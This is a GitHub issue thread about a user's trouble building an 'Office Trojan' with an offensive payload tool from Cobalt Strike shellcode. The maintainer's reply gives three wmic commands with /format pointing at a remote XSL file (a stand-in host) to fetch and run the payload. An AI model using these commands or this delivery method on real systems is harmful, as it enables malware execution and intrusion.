Skip to content
This repository has been archived by the owner on Aug 18, 2023. It is now read-only.

Error generating Office Trojan #21

Closed
adminfanf opened this issue Mar 27, 2022 · 6 comments
Closed

Error generating Office Trojan #21

adminfanf opened this issue Mar 27, 2022 · 6 comments

Comments

@adminfanf
Copy link

I am sorry that I cannot open the xxx. XLS file because there is something wrong with the content. What should I do
@Tylous
Copy link
Contributor

Tylous commented Mar 28, 2022

Could show/tell me how you are executing it. The more details you provide me the easier it is for me to identify the issue.

@adminfanf
Copy link
Author

I used Cobalt Strike to generate the C language payload and then used Ivy. exe-ix64 stageless64.bin -ix86 stageless32.bin -p Local -o test. XSL -delivery XSL -stageless is generated, but I don't know if the -URL parameter is required

@Tylous
Copy link
Contributor

Tylous commented Mar 28, 2022

How are you trying to execute the file?

@adminfanf
Copy link
Author

Runs as an administrator on Windows

@Tylous
Copy link
Contributor

Tylous commented Mar 28, 2022

That's the problem you cant just write click it. XSL files like that need to be executed with a WMIC command that allows for a format command argument. When you compiled it, It should of listed something like this:

wmic computersystem list full /format:"http://ACME.com/test.xsl"
wmic computersystem list brief /format:"http://ACME.com/test.xsl"
wmic process list brief /format:"http://ACME.com/test.xsl"

Those are how you can execute the file.

@adminfanf
Copy link
Author

Okay, I'll try it. Thank you very much

@Tylous Tylous closed this as completed Apr 13, 2022
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@Tylous @adminfanf